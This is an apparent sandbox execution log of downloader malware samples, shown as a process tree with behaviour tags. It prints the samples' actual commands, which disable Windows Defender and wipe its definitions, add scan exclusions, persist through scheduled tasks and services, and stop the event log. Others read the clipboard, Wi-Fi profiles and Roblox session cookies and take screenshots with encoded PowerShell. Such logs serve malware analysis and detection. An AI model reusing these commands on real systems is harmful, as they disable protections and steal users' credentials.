C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\a0PU4Q6DFljY.bat" "4⤵PID:5816
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:6004
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5536
-
-
C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3980 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4644
-
-
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\KN7900ZMYUSR" & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3816
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5604 -
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"3⤵
- Executes dropped EXE
PID:5236
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5188 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Suspicious behavior: MapViewOfSection
PID:6108 -
C:\Windows\EXPLORER.EXEC:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}5⤵PID:5844
-
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\microsoft-onedrive.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\microsoft-onedrive.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1564 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"5⤵PID:5952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:5936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:5132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1176
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:3772
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:5832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:3560
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:5916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:4452
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:5304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:1308
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:3908 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"6⤵
- Views/modifies file attributes
PID:6060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‌ .scr'"5⤵PID:2172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‌ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:860
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4944
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:1372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:5712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
PID:2332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:3920
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2596
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5956 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4676
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:2736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:4252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:4184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:3204
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Views/modifies file attributes
PID:5472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1796
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:1592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:6068
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3076
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4308
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:2332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:1096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1080
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\onedrive.exe"C:\Users\Admin\AppData\Local\Temp\onedrive.exe"3⤵
- Executes dropped EXE
PID:3064 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1292
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4980
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KOPWGCIF"4⤵
- Launches sc.exe
PID:992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"4⤵
- Launches sc.exe
PID:3220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KOPWGCIF"4⤵
- Launches sc.exe
PID:4240
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7CE7.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3036
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3300
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\njSilent.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\njSilent.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2628 -
C:\Windows\svchost.exe"C:\Windows\svchost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:5320 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5492
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 14964⤵PID:6056
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge..exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:924
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3616
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1388 -
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe'"4⤵PID:452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"4⤵PID:4440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3548
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5144
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"2⤵
- Executes dropped EXE
PID:5968 -
